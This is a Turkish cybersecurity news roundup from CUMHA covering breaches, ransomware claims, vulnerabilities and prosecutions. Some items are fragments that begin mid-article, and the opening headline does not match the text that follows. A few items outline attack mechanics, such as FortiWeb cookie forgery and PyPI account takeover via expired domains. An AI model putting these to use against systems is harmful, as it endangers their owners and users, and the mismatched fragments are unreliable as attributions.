BTK, yaklaşık 2 milyon 500 bin e-imza kullanıcısını hedef alan asılsız paylaşımlar nedeniyle sorumlu kişiler hakkında suç duyurusunda bulunulduğunu açıkladı.

BTK: "E-imza veri havuzu sızıntısı iddiaları asılsız, sorumlular hakkında suç duyurusunda bulunuldu"

Kaynak: CUMHA - CUMHUR HABER AJANSI

Veri ihlali sonucunda TTB sisteminde yer alan kayıtlı dosyalara erişildiği ve bu dosyaların silindiği ifade edildi. İhlalden etkilenen gruplar arasında çalışanlar, kullanıcılar ve tabip odalarına kayıtlı üyeler yer aldı.

Hangi veriler etkilendi
Yapılan açıklamada, kimlik, iletişim, lokasyon, hukuki işlem ve işlem güvenliği verilerinin saldırıdan etkilendiği belirtildi. Üye veri tabanına erişim sağlanamadığı için kesin sayı belirlenemese de yaklaşık 107 bin kişinin bu ihlalden etkilenebileceği bildirildi.

KVKK kararı
Kişisel Verileri Koruma Kurulu (KVKK), 14 Ağustos 2025 tarihli ve 2025/1514 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Kurulun incelemelerinin sürdüğü aktarıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hizmetlerde kesinti
Colt’un açıklamasına göre kesintiler; Colt Online, Voice API platformu ve barındırma/numara taşıma hizmetlerini etkiliyor. Müşteri iletişimi çevrimiçi portallar üzerinden sağlanamıyor, yalnızca e-posta ve telefon ile destek veriliyor. Şirket, etkilenen sistemlerin destek hizmetleri olduğunu, temel müşteri ağ altyapısının zarar görmediğini belirtti.

WarLock’un iddiası
‘cnkjasdfgd’ takma adlı bir tehdit aktörü, WarLock fidye yazılım grubu adına saldırıyı üstlendi. Aktör, Colt’tan çalındığını iddia ettiği bir milyon belgeyi 200.000 dolara satışa sundu ve bazı örnek dosyaları yayımladı. İddialara göre dosyalar; finansal veriler, çalışan ve müşteri bilgileri, üst düzey yöneticilere ait veriler, dahili e-postalar ve yazılım geliştirme belgelerini içeriyor.

Olası güvenlik açığı
Siber güvenlik araştırmacısı Kevin Beaumont, saldırganların Microsoft SharePoint’te bulunan ve CVE-2025-53770 olarak izlenen kritik uzaktan kod yürütme açığını kullanmış olabileceğini belirtti. Bu açık en az 18 Temmuz’dan itibaren sıfır gün olarak istismar edilmiş ve Microsoft tarafından 21 Temmuz’da yamalanmıştı.

Beaumont’a göre saldırganlar yüzlerce gigabaytlık müşteri verisi ve iç dokümanı sistemlerden dışarı çıkardı.

Colt’un açıklaması
Şirket sözcüsü, BleepingComputer’a yaptığı açıklamada, “Siber olayla ilgili iddiaların farkındayız, incelemelerimiz sürüyor. Teknik ekibimiz, üçüncü taraf uzmanlarla birlikte etkilenen sistemleri geri yüklemeye odaklanmış durumda” ifadelerini kullandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Fortinet’in FortiWeb ürününde bulunan kritik bir güvenlik açığı, saldırganların herhangi bir kullanıcıyı, hatta yöneticileri taklit etmesine imkân tanıyor. CVE-2025-52970 olarak izlenen açık, 12 Ağustos’ta yayımlanan güncelleme ile kapatıldı.

Açığın teknik ayrıntıları
Araştırmacı Aviv Y tarafından “FortMajeure” adı verilen açık, FortiWeb’in çerez ayrıştırmasındaki “out-of-bounds read” hatasından kaynaklanıyor. Saldırgan, Era parametresine beklenmedik bir değer atayarak sunucunun tüm sıfırlardan oluşan gizli anahtarı kullanmasına neden oluyor. Bu durum, sahte kimlik doğrulama çerezlerinin kolayca oluşturulmasını sağlıyor.

Açığın başarılı şekilde istismar edilmesi için hedef kullanıcının aktif oturum açmış olması gerekiyor. Ardından saldırgan, çerezdeki küçük bir sayısal alanı brute-force yöntemiyle tahmin etmek zorunda. Ancak bu alanın değer aralığının 30’dan küçük olması, saldırıyı pratikte kolaylaştırıyor.

Etkilenen sürümler ve yamalar
Açık, FortiWeb’in 7.0 ile 7.6 arasındaki sürümlerini etkiliyor. Güvenli sürümler ise şu şekilde:

• FortiWeb 7.6.4 ve üzeri

• FortiWeb 7.4.8 ve üzeri

• FortiWeb 7.2.11 ve üzeri

• FortiWeb 7.0.11 ve üzeri

FortiWeb 8.0 sürümleri bu açıktan etkilenmiyor. Fortinet, geçici çözüm bulunmadığını ve tek etkili adımın güncelleme olduğunu duyurdu.

Araştırmacının kararı
Aviv Y, açığın temelini gösteren bir PoC paylaştı, ancak REST endpoint üzerinden yönetici taklidi dışında tüm istismar zincirini yayımlamadı. Tam kodun daha sonra açıklanacağını, böylece sistem yöneticilerine yamaları uygulama süresi tanındığını belirtti.

Araştırmacıya göre, eksik detaylar bilgili saldırganların bile tek başına tam bir istismar geliştirmesine imkân vermiyor. Ancak duyuruların ardından siber suçluların hızlıca harekete geçtiği düşünüldüğünde, FortiWeb kullanıcılarının derhal güncelleme yapması gerekiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’nin California eyaletinde merkezi bulunan Workday, üçüncü taraf müşteri ilişkileri yönetim (CRM) platformuna yönelik bir sosyal mühendislik saldırısında veri ihlali yaşandığını duyurdu. Şirket, olayda müşteri kiracı verilerine erişim sağlanmadığını ancak bazı iş iletişim bilgilerinin sızdırıldığını açıkladı.

Saldırının ayrıntıları
Workday’in 16 Ağustos’ta yaptığı duyuruya göre saldırganlar, şirket çalışanlarını hedef alan sosyal mühendislik yöntemleriyle CRM platformuna erişim sağladı. Açığa çıkan veriler arasında ad, e-posta adresi ve telefon numaraları gibi bilgilerin bulunduğu belirtildi. Şirket, bu tür bilgilerin sonraki oltalama saldırılarında kullanılabileceği uyarısında bulundu.

Olayın 6 Ağustos’ta tespit edildiği ve saldırganların kendilerini İK veya BT çalışanı gibi tanıtarak mesaj ve telefon yoluyla bilgi toplamaya çalıştığı bildirildi.

ShinyHunters bağlantısı
Olay, ShinyHunters grubuyla ilişkilendirilen küresel saldırı dalgasının bir parçası. Grup, yıl başından bu yana Salesforce tabanlı CRM sistemlerini hedef alarak kötü amaçlı OAuth uygulamaları üzerinden veritabanlarına erişiyor. Daha önce Adidas, Qantas, Allianz Life, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Google gibi büyük şirketler de benzer saldırılardan etkilendi.

Çalınan veriler, e-posta yoluyla kurbanlardan fidye talep etmek amacıyla kullanılıyor. ShinyHunters, daha önce Snowflake, AT&T ve PowerSchool saldırılarıyla da gündeme gelmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Popüler ağ yönetim platformu N-able N-central’da keşfedilen iki kritik güvenlik açığı, dünya genelinde yüzlerce sunucuyu risk altında bırakıyor. CVE-2025-8875 ve CVE-2025-8876 olarak takip edilen açıklar, kimliği doğrulanmış saldırganların komut enjeksiyonu yapmasına ve güvenli olmayan serileştirme zafiyeti üzerinden komut çalıştırmasına imkân tanıyor.

Durumun ciddiyeti
N-able, açıkların yamalandığını ve 2025.3.1 sürümüyle kapatıldığını duyurdu. Ancak Shadowserver Foundation verilerine göre hâlâ 880 sunucu güncellenmedi. Çoğu ABD, Kanada ve Hollanda’da bulunuyor. Shodan aramalarında internete açık yaklaşık 2.000 N-central örneği görüldü.

N-able, yaptığı açıklamada güvenlik ihlallerinin yalnızca sınırlı sayıda şirket içi ortamda gözlemlendiğini, kendi bulut ortamlarında ise istismar tespit edilmediğini bildirdi.

CISA’dan zorunlu talimat
ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), açıkları “bilinen istismar edilen güvenlik açıkları” listesine ekledi. Federal kurumların, özellikle İç Güvenlik Bakanlığı, Hazine Bakanlığı ve Enerji Bakanlığı’nın sistemlerini 20 Ağustos’a kadar yamalaması zorunlu hale getirildi.

CISA, özel sektör kuruluşlarına doğrudan yükümlülük getirmese de tüm ağ yöneticilerini N-able’ın yayımladığı yamaları uygulamaya, aksi halde ürünü devre dışı bırakmaya çağırdı. Açıklamada, “Bu tür açıklar kötü niyetli aktörler için sık kullanılan saldırı vektörleri olmaya devam ediyor” denildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İngiltere’de 26 yaşındaki Al-Tahery Al-Mashriky, binlerce web sitesine saldırdığı ve milyonlarca kişiye ait bilgileri çaldığı suçlamalarını kabul ederek 20 ay hapis cezası aldı.

Soruşturmanın geçmişi
Mashriky, 2022 yılında ABD kolluk kuvvetlerinden gelen bilgiler doğrultusunda İngiltere’de tutuklandı. Mart 2025’te görülen davada suçunu kabul ederek dokuz suçtan hüküm giydi. Suçlamalar arasında Facebook kullanıcılarına ait milyonlarca giriş bilgisinin çalınması, Yemen hükümeti ve İsrail merkezli bir haber sitesi gibi kurumların hacklenmesi yer aldı.

Hedef alınan kurumlar
Adli incelemeler, Yemen Dışişleri Bakanlığı ve Yemen Güvenlik Medya Bakanlığı’nın sitelerine sızıldığını ve bu sitelerde kullanıcı adı tarama araçları yerleştirildiğini ortaya koydu. Ayrıca İsrail’deki Live News sitesinin yönetici sayfalarına erişildi ve tüm içerik indirildi. ABD ve Kanada’daki dini kuruluşlar ile Kaliforniya Su Kurulu da hedefler arasında bulundu.

Çalınan veriler
Mashriky’nin elinde 4 milyondan fazla Facebook kullanıcısına ait veriler, ayrıca Netflix ve PayPal gibi hizmetlere ait çalıntı kullanıcı bilgileri bulundu. Saldırıların bazılarında web siteleri siyasi ve dini içeriklerle tahrif edildi.

Ulusal Suç Ajansı açıklaması
İngiltere Ulusal Suç Ajansı (NCA) Siber Suç Birimi Başkanı Paul Foster, Mashriky’nin saldırılarının büyük ölçüde kesinti yarattığını belirterek, “Bu saldırılar yalnızca siyasi ve ideolojik mesaj yaymak için yapıldı. Ayrıca milyonlarca kişiyi dolandırmaya imkân sağlayacak kişisel verileri de ele geçirdi” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sızıntının içeriği
Arşivde zararlının PHP tabanlı komuta-kontrol altyapısı, React ile hazırlanmış operatör paneli, Go dilinde yazılmış veri sızdırma sunucusu, Kotlin tabanlı arka kapı ve özelleştirilmiş APK üreticisi yer aldı. Analizler, ERMAC 3.0’ın önceki sürümlere kıyasla kapsamını önemli ölçüde genişlettiğini gösterdi.

Hedefler ve yetenekler
ERMAC’ın yeni sürümü, bankacılık, alışveriş ve kripto para uygulamaları dahil olmak üzere 700’den fazla mobil uygulamayı hedefliyor. Zararlı yazılım; SMS, kişi listesi ve hesap bilgilerini çalabiliyor, Gmail içeriklerine erişebiliyor, sahte bildirimler gösterebiliyor, cihaz kamerasıyla fotoğraf çekebiliyor ve uzaktan uygulama yönetimi yapabiliyor. Ayrıca, cihazdan dosya indirme, çağrı yönlendirme ve SMS gönderme gibi iletişim suiistimali özelliklerine de sahip.

Altyapı zafiyetleri
Hunt.io, sızıntı sayesinde ERMAC’ın canlı komuta-kontrol sunucularını ve operatör panellerini tespit etti. İncelemelerde sabitlenmiş JWT tokenleri, varsayılan kök kullanıcı bilgileri ve korumasız yönetim panelleri gibi ciddi güvenlik açıkları bulundu. Bu durum, altyapının dışarıdan erişime ve manipülasyona açık hale gelmesine neden oldu.

Olası etkiler
Kaynak kod sızıntısının, ERMAC’ı “hizmet olarak kötü amaçlı yazılım” (MaaS) modelinde kullanan suçluların güvenini zedelemesi bekleniyor. Güvenlik çözümlerinin ERMAC’ı daha iyi tespit etmesi mümkün olsa da, kodun diğer tehdit aktörlerinin eline geçmesi durumunda daha gelişmiş ve tespit edilmesi zor yeni varyantların ortaya çıkabileceği değerlendiriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’nin Nebraska eyaletinde yaşayan Charles O. Parks III, “CP3O” takma adıyla yürüttüğü kripto madenciliği operasyonu nedeniyle 1 yıl hapis cezasına mahkum edildi. Parks, iki büyük bulut bilişim sağlayıcısını 3,5 milyon dolar dolandırarak yaklaşık 1 milyon dolar değerinde kripto para elde etti.

Dolandırıcılık yöntemi
Savcılık belgelerine göre Parks, “CP3O LLC” ve “MultiMillionaire LLC” gibi sahte şirketler kurarak Microsoft ve Amazon merkezli bulut hizmet sağlayıcıları da kapsayan platformlardan yüksek seviyeli işlem gücü aldı. Ocak–Ağustos 2021 arasında faturaları ödemeyerek sağlayıcıların dikkatini farklı bahanelerle dağıttı. Bir şirket yetkililerine, küresel bir çevrimiçi eğitim platformu kurduğunu ve 10 bin öğrenciye hizmet vermeyi planladığını söyledi.

Kripto madenciliği ve kara para aklama
Elde ettiği işlem gücüyle Monero (XMR), Ether (ETH) ve Litecoin (LTC) üreten Parks, kripto varlıklarını çeşitli borsalar, çevrimiçi ödeme hizmetleri, New York merkezli bir NFT pazarı ve banka hesapları üzerinden akladı. Tüm varlıkları nakde çevirerek lüks bir Mercedes-Benz S AMG otomobil, mücevherler ve birinci sınıf seyahatler satın aldı.

Kamuoyuna yansımaları
Savcılık açıklamasında Parks’ın kendisini kripto alanında “inovatif bir düşünce lideri” gibi gösterdiği, ancak gerçekte “yalnızca bir dolandırıcı” olduğu ifade edildi. Parks’ın, 2022’de YouTube kanalında “MultiMillionaire Mentality” başlıklı bir video yayımlayarak sözde zenginlik ipuçlarını paylaştığı da belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Trellix tarafından yayımlanan rapora göre, devlet destekli olduğu değerlendirilen bir casusluk kampanyası Güney Kore’deki yabancı elçilikleri hedef alıyor. Kampanyada XenoRAT zararlı yazılımı, sahte diplomatik e-postalarla dağıtılıyor.

Çok aşamalı saldırılar
Saldırılar Mart ayında başladı ve halen devam ediyor. İlk olarak Orta Avrupa’daki bir elçilik hedef alınırken, Mayıs ayında Batı Avrupa elçiliklerine sahte toplantı davetleri gönderildi. Haziran ve Temmuz aylarında ise ABD–Kore askeri iş birliği temalı oltalama e-postaları öne çıktı.

E-postalar, diplomat kimliğine bürünerek sahte toplantı davetleri, resmi yazılar ve etkinlik çağrıları şeklinde hazırlandı. İçerikler çok dilli olarak Korece, İngilizce, Fransızca, Arapça, Farsça ve Rusça yazıldı ve çoğu zaman gerçek diplomatik etkinliklerle eşleştirildi.

Zararlı yazılım dağıtımı
Saldırganlar, Dropbox, Google Drive ve Daum gibi servislerde barındırılan parola korumalı ZIP dosyaları kullandı. Dosyalarda PDF gibi görünen LNK dosyaları yer aldı. Bu dosyalar çalıştırıldığında gizlenmiş PowerShell komutları devreye girerek GitHub veya Dropbox’tan XenoRAT yükünü indiriyor ve sistemde kalıcılık sağlıyor.

XenoRAT, tuş kaydı alma, ekran görüntüsü alma, kamera ve mikrofon erişimi, dosya transferi ve uzaktan komut yürütme gibi özelliklere sahip. Bellekte doğrudan yüklenmesi ve Confuser Core ile gizlenmesi sayesinde tespit edilmesi zorlaşıyor.

Kimin arkasında olduğu tartışılıyor
Saldırılarda kullanılan altyapı ve teknikler, Kuzey Kore bağlantılı Kimsuky (APT43) grubunu işaret ediyor. Ancak saldırıların zamanlaması ve tatil dönemlerindeki duraksamalar Çin takvimine uyum gösteriyor. Bu nedenle Trellix, kampanyayı APT43’e “orta düzey güvenle” atfederek Çin desteği ihtimalini de göz ardı etmiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’de faaliyet gösteren ve Allianz SE’nin iştiraki olan Allianz Life, Temmuz ayında gerçekleşen büyük çaplı bir veri ihlalini doğruladı. Şirketin 1,4 milyon müşterisinin “çoğunluğunu” etkileyen olayda, 1,1 milyon kişinin kişisel bilgileri saldırganlar tarafından ele geçirildi.

Saldırının yöntemi
Siber saldırı, 16 Temmuz’da üçüncü taraf bulut tabanlı CRM sistemi Salesforce üzerinden gerçekleştirildi. ShinyHunters grubu, çalışanları kandırarak şirketin Salesforce altyapısına kötü amaçlı bir OAuth uygulaması bağladı. Bu erişim üzerinden müşteri ve iş ortaklarına ait veritabanları indirildi.

Çalınan veriler
Sızdırılan bilgiler arasında ad-soyad, e-posta adresi, cinsiyet, doğum tarihi, telefon numarası ve fiziksel adresler yer alıyor. Bazı dosyalarda vergi kimlik numaraları ve diğer finansal bilgiler de bulundu. Veri ihlali bildirim hizmeti Have I Been Pwned, toplamda 2,8 milyon kaydın sızdırıldığını açıkladı.

ShinyHunters’ın rolü
ShinyHunters grubu, Allianz Life’ın yanı sıra Google, Adidas, Qantas, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Workday gibi birçok büyük kurumu da hedef aldı. Grup, geçmişte Snowflake, AT&T ve PowerSchool gibi saldırılarla da gündeme gelmişti.

Allianz Life’ın açıklaması
Şirket, devam eden soruşturma nedeniyle ayrıntı veremeyeceğini, ancak bazı çalışanların da veri ihlalinden etkilendiğini doğruladı. Allianz Life, etkilenen müşterilerle iletişime geçtiğini ve incelemelerin sürdüğünü bildirdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Altı ay sonra tespit edildi
BCNYS, saldırıyı yaklaşık altı ay sonra, 4 Ağustos’ta fark etti. Yapılan incelemelerde, tehdit aktörlerinin kişisel, finansal ve sağlık bilgilerini içeren dosyalara erişerek kopyaladığı ortaya çıktı.

Çalınan veriler
Etkilenen bilgiler arasında ad-soyad, Sosyal Güvenlik numarası, doğum tarihi, eyalet kimlik numarası, banka ve hesap bilgileri, kredi kartı numarası, PIN kodları, kart son kullanma tarihleri ve vergi mükellefi kimlik numaraları yer alıyor. Ayrıca tıbbi sağlayıcı adı, teşhis ve tedavi bilgileri, reçete bilgileri ve sağlık sigortası verileri de saldırıda ifşa edildi.

Alınan önlemler
BCNYS, olayın ardından dış uzmanlardan destek alarak sistemlerini güvenceye aldığını ve kapsamlı bir soruşturma başlattığını açıkladı. Şimdiye kadar finansal dolandırıcılık veya kimlik hırsızlığına dair kanıt bulunmadığı ifade edildi. Sosyal Güvenlik numarası ifşa olan kişilere ücretsiz kredi izleme hizmeti sağlanacak.

Kurum, etkilenen bireyleri hesap ekstrelerini ve ücretsiz kredi raporlarını düzenli olarak kontrol etmeleri konusunda uyardı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’nin Indiana eyaletinde faaliyet gösteren ilaç şirketi Inotiv, 8 Ağustos 2025’te gerçekleşen bir fidye yazılım saldırısının şirketin operasyonlarını etkilediğini açıkladı. U.S. Securities and Exchange Commission (SEC) başvurusunda paylaşılan bilgilere göre saldırganlar, şirketin bazı sistemlerine yetkisiz erişim sağladı ve verileri şifreledi.

Saldırıyı Qilin üstlendi
Qilin fidye yazılım grubu, saldırıyı kendi sızıntı sitesinde duyurarak yaklaşık 176 GB büyüklüğünde 162.000 dosyayı ele geçirdiğini öne sürdü. Grup, çaldığı verilerden bazı örnekleri de yayımladı.

Alınan önlemler
Inotiv, olayın ardından harici siber güvenlik uzmanlarıyla birlikte soruşturma başlattı ve kolluk kuvvetlerini bilgilendirdi. Şirketin IT ekibi, etkilenen sistemleri yeniden işler hale getirmek için çalışmalar yürütüyor. Bazı iş süreçleri ise çevrimdışı alternatiflere taşınarak kesintilerin etkisi azaltılmaya çalışılıyor.

Şirket, saldırının veritabanları ve iş süreçlerinde kullanılan bazı iç uygulamaları etkilediğini, bu nedenle operasyonlarda aksaklıkların bir süre daha devam etmesini beklediklerini duyurdu. Normal işleyişe dönüş için net bir tarih verilmedi.

Inotiv hakkında
Yaklaşık 2.000 kişiyi istihdam eden ve yıllık 500 milyon dolardan fazla gelir elde eden Inotiv, ilaç keşfi, geliştirilmesi, güvenlik değerlendirmesi ve canlı hayvan araştırma modelleri konularında uzmanlaşmış bir sözleşmeli araştırma kuruluşu olarak faaliyet gösteriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İddialar
AshES Cybersecurity, Elastic Defend’in elastic-endpoint-driver.sys adlı sürücüsünde NULL pointer dereference hatası bulunduğunu, bunun da EDR korumasını atlatmaya, uzaktan kod yürütmeye ve kalıcılık sağlamaya yol açabileceğini öne sürdü. Araştırmacı, kendi hazırladığı sürücü ile bu hatayı tetiklediğini, Windows’un çökmesini ve calc.exe dosyasının EDR tarafından engellenmeden açılmasını gösteren iki video yayımladı.

Elastic’in yanıtı
Elastic Güvenlik Mühendisliği ekibi, iddiaları inceleyerek rapor edilen açığın yeniden üretilemediğini belirtti. Şirket, AshES tarafından gönderilen raporların tekrarlanabilir bir sömürü kanıtı içermediğini ve araştırmacının PoC paylaşmayı reddettiğini duyurdu.

Elastic açıklamasında, güvenlik araştırmalarında koordineli açıklamanın esas olduğunu, ancak bu raporda sürecin takip edilmediğini vurguladı. Şirket, 2017’den bu yana hata ödül programı kapsamında güvenlik araştırmacılarına 600.000 dolardan fazla ödeme yapıldığını hatırlattı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Okta, Auth0 kullanıcılarının güvenlik tehditlerini daha hızlı tespit edebilmesi için Sigma tabanlı kurallardan oluşan açık kaynaklı bir “Customer Detection Catalog” yayımladı. Yeni kurallar seti, şüpheli etkinliklerin log kayıtları üzerinden daha kolay analiz edilmesini sağlayarak hesap ele geçirme ve yapılandırma hataları gibi risklere karşı koruma sunuyor.

Yeni katalog neler içeriyor
Auth0, dünya genelinde birçok kurum tarafından kimlik doğrulama ve kullanıcı yönetimi amacıyla kullanılan bir platform. Daha önce kullanıcıların şüpheli aktiviteleri tespit etmek için kendi kurallarını yazmaları gerekiyordu. Okta’nın yayımladığı katalog ise, topluluk katkısına açık şekilde sürekli güncellenen hazır sorgular sunuyor.

Şirketin açıklamasına göre bu kurallar, anormal kullanıcı davranışlarını, potansiyel hesap ele geçirmelerini, hatalı yapılandırmaları ve sahte yönetici hesaplarının oluşturulmasını ortaya çıkarabiliyor. Ayrıca SMS bombardımanı ve token hırsızlığı gibi saldırı yöntemlerinin log kayıtları üzerinden izlenmesine de imkan tanıyor.

Kullanım süreci
Kullanıcılar, kurallara GitHub üzerinden erişebiliyor. Sigma uyumlu sorgular, sigma-cli gibi dönüştürücüler aracılığıyla farklı SIEM veya log analiz sistemlerine uyarlanabiliyor. Kurallar önce geçmiş loglar üzerinde test edilerek yanlış pozitif sonuçlar ayıklanabiliyor, ardından canlı ortama aktarılabiliyor.

Okta, kullanıcıların kendi geliştirdikleri kuralları da GitHub deposuna “pull request” yoluyla ekleyebileceğini, böylece topluluk temelli bir güvenlik katmanı oluşturulacağını belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı yöntemi nasıl işliyor
PyPI üzerindeki proje geliştiricilerinin hesapları, e-posta adresleriyle bağlantılı olarak çalışıyor. Bazı adresler özel alan adlarına bağlı olduğunda, bu alan adı süresi dolduğunda saldırganlar aynı alan adını yeniden kaydedebiliyor. Sonrasında bir e-posta sunucusu kurarak parola sıfırlama talebinde bulunabiliyor ve ilgili PyPI hesabının kontrolünü ele geçirebiliyor.

Bu tür saldırılar tedarik zinciri riski yaratıyor. Ele geçirilen hesaplarla popüler Python paketlerinin kötü amaçlı sürümleri yayımlanabiliyor ve bu paketler pip üzerinden otomatik yüklenebiliyor. Daha önce Mayıs 2022’de “ctx” paketine yapılan saldırıda saldırganlar Amazon AWS anahtarlarını hedef alan kötü amaçlı kod eklemişti.

Yeni koruma sistemi
PyPI, alan adlarının yaşam döngüsünü (aktif, ek süre, kurtarma süresi, silinme beklemede) Domainr’ın Status API servisini kullanarak kontrol ediyor. Alan adı süresi dolmuş veya sona erme aşamasına girmişse, bu e-posta adresleri doğrulamasını kaybediyor ve parola sıfırlama ya da hesap kurtarma işlemlerinde kullanılamıyor.

Yeni sistemin geliştirilmesi Nisan 2025’te başladı ve Haziran 2025’te günlük taramalarla devreye alındı. O tarihten bu yana 1.800’den fazla e-posta adresi bu kapsamda geçersiz sayıldı.

Kullanıcılara öneriler
PyPI, kullanıcıların hesaplarına özel alan adı yerine genel e-posta servislerinden yedek bir adres eklemelerini ve hesap güvenliği için iki faktörlü kimlik doğrulama kullanmalarını öneriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber suçlarla bağlantılı kripto paraların izlenmesi ve engellenmesine yönelik iki farklı girişim kapsamında, 300 milyon dolardan fazla değerde dijital varlık donduruldu. Çalışmalar, uluslararası kolluk kuvvetleri ile özel sektör iş birliğinde yürütüldü.

T3 FCU girişimi
TRM Labs, TRON ve Tether tarafından 2024 yılında başlatılan T3 Finansal Suç Birimi (T3 FCU), bugüne kadar 250 milyon doların üzerinde suç gelirini dondurdu. Binance’in ilk resmi üye olarak katıldığı girişimde, milyonlarca işlem analiz edilerek kara para aklama, yatırım dolandırıcılığı, terör finansmanı ve fidye yazılımları gibi vakalarla ilgili soruşturmalara destek sağlandı.

TRM Labs tarafından yapılan açıklamada, Eylül 2024’ten bu yana beş kıtada 3 milyar doların üzerinde işlem hacminin izlendiği, bu kapsamda özellikle “romantik tuzak” adı verilen dolandırıcılık yöntemlerine yönelik 6 milyon doların dondurulduğu belirtildi.

Kanada ve ABD merkezli operasyonlar
Diğer girişim ise ABD ve Kanada’nın yürüttüğü, Chainalysis uzmanlarının destek verdiği operasyonlarla gerçekleşti. Ontario Eyalet Polisi tarafından yürütülen “Project Atlas” ve Britanya Kolumbiyası Menkul Kıymetler Komisyonu tarafından yönetilen “Operation Avalanche” kapsamında, son altı ayda 74,3 milyon dolarlık kayıp tespit edildi.

Chainalysis verilerine göre, bu operasyonlar kapsamında 14 farklı ülkede 2.000’den fazla kripto cüzdan adresi belirlendi. Tether ile yapılan iş birliği sayesinde 50 milyon dolardan fazla USDT kara listeye alındı ve suçluların bu varlıkları nakde çevirmesi engellendi.

Uzmanlara göre, bu tür küresel iş birlikleri, siber suçların finansman kaynaklarını kurutma ve suç gelirlerinin dolaşımını blockchain üzerinde doğrudan engelleme açısından kritik önem taşıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hangi sürümler etkileniyor
Cisco’ya göre açık, FMC yazılımının 7.0.7 ve 7.7.0 sürümlerinde, RADIUS kimlik doğrulaması aktifken ortaya çıkıyor. Bu, özellikle kurumsal ve devlet ağlarında merkezi kimlik doğrulama için sık kullanılan bir konfigürasyon.

Güncellemeler yayımlandı
Cisco, güvenlik açığını gidermek için ücretsiz yazılım güncellemelerini yayımladı. Yama, geçerli hizmet sözleşmesine sahip müşteriler için standart kanallar üzerinden erişilebilir durumda.

Geçici çözüm seçeneği
Yama yüklenemeyen ortamlarda önerilen tek geçici çözüm, RADIUS kimlik doğrulamasını devre dışı bırakarak yerine yerel kullanıcı hesapları, LDAP ya da SAML tabanlı kimlik doğrulama yöntemlerinin kullanılması.

Henüz istismar edilmedi
Açık, Cisco güvenlik araştırmacısı Brandon Sakai tarafından dahili testlerde keşfedildi. Şirket, açığın sahada istismar edildiğine dair herhangi bir bulguya sahip olmadığını açıkladı.

Ek güvenlik yamaları
Cisco ayrıca Snort 3, ASA, FTD, IOS ve IOS XE gibi ürünlerde hizmet reddi (DoS) ve HTML enjeksiyonu gibi 13 yüksek önem dereceli güvenlik açığını da kapattı. Bu açıkların hiçbirinin aktif olarak istismar edildiği raporlanmadı.

beykoz haber

Kaynak: CUMHA - CUMHUR HABER AJANSI

145 bin kişi bilgilendirildi
Maine Başsavcılığı’na yapılan bildirimde, 144.189 kişinin verilerinin saldırıdan etkilendiği belirtildi. Çalınan veriler arasında kimlik bilgileri, pasaport taramaları, sosyal güvenlik numaraları, adresler, iletişim bilgileri ve test sonuçları yer alabileceği aktarıldı.

RansomHub saldırıyı üstlendi
RansomHub fidye yazılımı grubu, Ocak 2025’te saldırıyı üstlendiğini açıkladı. Grup, Manpower’ın sistemlerinden yaklaşık 500 GB veri çaldığını ve bunun içinde yıllara ait yazışmalar, mali tablolar, insan kaynakları verileri, gizli sözleşmeler ve NDA’ların bulunduğunu iddia etti. Daha sonra verilerin sızdırılacağına dair paylaşımlar grubun sızdırma sitesinden kaldırıldı, bu da fidyenin ödenmiş olabileceği ihtimalini gündeme getirdi.

Şirketten açıklama
ManpowerGroup sözcüsü, olayın yalnızca bağımsız bir franchise şubesini etkilediğini, şirketin kurumsal ağının saldırıdan etkilenmediğini vurguladı. Şirket, FBI ile iş birliği yaptığını ve etkilenen kişilere Equifax üzerinden ücretsiz kredi izleme ve kimlik hırsızlığına karşı koruma hizmeti sunduğunu açıkladı.

RansomHub’ın geçmişi
RansomHub, daha önce Halliburton, Rite Aid, Kawasaki, Christie's, Frontier Communications ve Planned Parenthood gibi kurumları da hedef aldı. Grup ayrıca Change Healthcare saldırısında 190 milyondan fazla kişinin etkilendiği verileri sızdırmıştı. FBI, Ağustos 2024 itibarıyla grubun 200’den fazla kritik altyapı kuruluşunu hedef aldığını bildirmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

3,3 milyon dolarlık zarar
Sanığın, 8,4 milyon dolarlık sahte vergi iadesi başvurusu yaparak yaklaşık 2,5 milyon dolar elde ettiği, ayrıca sahte SBA kredi başvurularıyla 819 bin dolar çaldığı belirtildi. Toplam zarar 3,3 milyon doları aştı.

Sahte yatırım planı da yürüttü
Savcılığa göre Amachukwu, aynı dönemde sahte yatırım teklifleriyle de mağdurları kandırdı. “Standby letter of credit” gibi gerçekte var olmayan finansal araçları satarak milyonlarca doları kendi hesabına aktardı.

Fransa’dan iade edildi
Amachukwu, 4 Ağustos 2025’te Fransa’dan ABD’ye iade edildi ve ertesi gün New York Güney Bölgesi’nde hâkim karşısına çıkarıldı. Henüz duruşma tarihi belirlenmedi.

Ciddi cezalarla karşı karşıya
Sanık hakkında bilgisayar korsanlığına teşebbüs (5 yıl), iki kez kablolu dolandırıcılık (her biri 20 yıl), iki kez kablolu dolandırıcılığa teşebbüs (her biri 20 yıl) ve ağırlaştırılmış kimlik hırsızlığı (zorunlu 2 yıl ek ceza) suçlamaları bulunuyor. Ayrıca elde ettiği tüm malvarlıklarına el konulması talep ediliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

T3+ programı ile 250 milyon dolar donduruldu
